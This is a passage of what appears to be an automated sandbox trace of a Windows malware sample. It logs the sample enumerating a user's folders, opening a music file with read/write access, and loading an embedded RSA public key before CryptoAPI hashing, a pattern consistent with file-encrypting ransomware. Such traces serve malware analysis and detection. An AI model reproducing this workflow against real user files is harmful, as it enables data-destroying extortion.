nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0169.998] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x244, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0169.999] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini") returned=".ini" [0169.999] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd34af8 | out: hHeap=0xcd0000) returned 1 [0169.999] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1e6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop.lnk", cAlternateFileName="")) returned 1 [0169.999] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk") returned=".lnk" [0169.999] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd34af8 | out: hHeap=0xcd0000) returned 1 [0169.999] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x3a1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads.lnk", cAlternateFileName="DOWNLO~1.LNK")) returned 1 [0169.999] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk") returned=".lnk" [0169.999] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd34af8 | out: hHeap=0xcd0000) returned 1 [0169.999] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 1 [0169.999] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk") returned=".lnk" [0169.999] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd34af8 | out: hHeap=0xcd0000) returned 1 [0169.999] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 0 [0169.999] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0169.999] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b50 | out: hHeap=0xcd0000) returned 1 [0169.999] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c768 | out: hHeap=0xcd0000) returned 1 [0170.000] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0170.000] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0170.000] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\") returned="Local Settings\\" [0170.000] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0170.000] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0170.000] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0170.000] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0170.000] PathFindFileNameW (pszPath="") returned="" [0170.000] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 0xffffffff [0170.001] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b41660 | out: hHeap=0xcd0000) returned 1 [0170.001] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b50 | out: hHeap=0xcd0000) returned 1 [0170.001] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71a00 | out: hHeap=0xcd0000) returned 1 [0170.001] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0170.001] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0170.001] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="Music\\" [0170.002] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0170.002] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0170.002] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0170.002] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0170.002] PathFindFileNameW (pszPath="") returned="" [0170.002] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd97f1340, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd97f1340, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0170.002] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362cc38 | out: hHeap=0xcd0000) returned 1 [0170.002] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd97f1340, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd97f1340, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0170.002] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9cfe8d0, ftCreationTime.dwHighDateTime=0x1d5d8d4, ftLastAccessTime.dwLowDateTime=0xd49fe120, ftLastAccessTime.dwHighDateTime=0x1d5db72, ftLastWriteTime.dwLowDateTime=0xd49fe120, ftLastWriteTime.dwHighDateTime=0x1d5db72, nFileSizeHigh=0x0, nFileSizeLow=0x2b19, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CsANIO3.m4a", cAlternateFileName="")) returned 1 [0170.002] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\CsANIO3.m4a") returned=".m4a" [0170.003] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\CsANIO3.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\csanio3.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0170.003] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=11033) returned 1 [0170.003] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0170.007] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x2af3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.007] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0170.008] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x2b19, lpOverlapped=0x0) returned 1 [0170.009] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0170.009] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0170.009] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0170.009] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2f140) returned 1 [0170.010] CryptCreateHash (in: hProv=0xd2f140, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0170.010] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0170.010] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0170.010] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0170.010] GetLastError () returned 0x0 [0170.010] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0170.010] CryptReleaseContext (hProv=0xd2f140, dwFlags=0x0) returned 1 [0170.010] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0170.010] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0170.010] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0170.010] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0170.010] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0170.010] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0170.010] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0170.011] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x2b20) returned 0x3b4cd10 [0170.011] SetFilePointer (in: hFile=0x664, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0170.011] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0170.011] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b39e58 [0170.011] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0170.011] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b447b0 [0170.011] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x36136d0 [0170.011] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b4bd28 [0170.011] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fc128 [0170.011] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b4bd70 [0170.011] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fc140 [0170.011] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fc170 [0170.011] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbb70 [0170.011] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fc188 [0170.011] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x24) returned 0x35f9e20 [0170.011] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x158) returned 0x3b51ec0 [0170.011] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ef80 [0170.011] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48820 [0170.011] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc170 | out: hHeap=0xcd0000) returned 1 [0170.011] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc188 | out: hHeap=0xcd0000) returned 1 [0170.011] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbb70 | out: hHeap=0xcd0000) returned 1 [0170.011] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f9e20 | out: hHeap=0xcd0000) returned 1 [0170.011] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0170.011] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbb70 [0170.011] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd310 [0170.012] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fc188 [0170.012] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a50 [0170.012] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x9) returned 0x35fc170 [0170.012] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd280 [0170.012] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10e) returned 0xd57fe0 [0170.012] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0170.012] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x3613610 [0170.012] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e06d0 [0170.012] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x104) returned 0x3aa2470 [0170.012] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a70 [0170.012] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd290 [0170.012] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0170.012] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc188 | out: hHeap=0xcd0000) returned 1 [0170.012] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0170.012] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc170 | out: hHeap=0xcd0000) returned 1 [0170.012] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a50 | out: hHeap=0xcd0000) returned 1 [0170.012] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd310 | out: hHeap=0xcd0000) returned 1 [0170.012] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbb70 | out: hHeap=0xcd0000) returned 1 [0170.012] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0170.012] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x36136d0 | out: hHeap=0xcd0000) returned 1 [0170.012] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b5ef80 | out: hHeap=0xcd0000) returned 1 [0170.012] GetCurrentThreadId () returned 0x324 [0170.012] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd57fe0 [0170.012] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x82) returned 0x3b49920 [0170.012] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x2c) returned 0x3608a70 [0170.013] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2f140 [0170.013] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x148) returned 0x35deb08 [0170.013] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd310 [0170.013] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd280 [0170.013] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35ceae8 [0170.013] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0170.013] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0170.013] GetCurrentThreadId () returned 0x324 [0170.013] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0170.013] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0170.013] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xeb) returned 0xd23a00 [0170.013] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0170.013] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0170.013] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0170.013] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0170.013] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd23a00 | out: hHeap=0xcd0000) returned 1 [0170.013] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd23a00 [0170.013] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd310 | out: hHeap=0xcd0000) returned 1 [0170.013] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4c) returned 0x362cc38 [0170.013] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd310 [0170.013] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35f7c30 [0170.013] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2c0 [0170.013] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbb70 [0170.013] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2c0 | out: hHeap=0xcd0000) returned 1 [0170.013] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2c0 [0170.013] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2f0 [0170.013] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd300 [0170.014] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2e0 [0170.014] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2a0 [0170.014] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd320 [0170.014] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd330 [0170.014] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fc170 [0170.014] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2f0 | out: hHeap=0xcd0000) returned 1 [0170.014] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2f0 [0170.014] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2c0 | out: hHeap=0xcd0000) returned 1 [0170.014] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2c0 [0170.014] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd350 [0170.014] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd360 [0170.014] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd340 [0170.014] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fc188 [0170.014] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd360 | out: hHeap=0xcd0000) returned 1 [0170.014] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a50 [0170.014] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd350 | out: hHeap=0xcd0000) returned 1 [0170.014] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fc158 [0170.014] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd340 | out: hHeap=0xcd0000) returned 1 [0170.014] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbc90 [0170.014] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2c0 | out: hHeap=0xcd0000) returned 1 [0170.014] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2c0 [0170.014] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd320 | out: hHeap=0xcd0000) returned 1 [0170.014] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbbe8 [0170.014] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2c0 | out: hHeap=0xcd0000) returned 1 [0170.014] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc00 [0170.014] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd300 | out: hHeap=0xcd0000) returned 1 [0170.014] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fc1a0 [0170.014] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbbe8 | out: hHeap=0xcd0000) returned 1 [0170.015] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbbe8 [0170.015] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc00 | out: hHeap=0xcd0000) returned 1 [0170.015] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd300 [0170.015] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd310 | out: hHeap=0xcd0000) returned 1 [0170.015] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a10 [0170.015] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd300 | out: 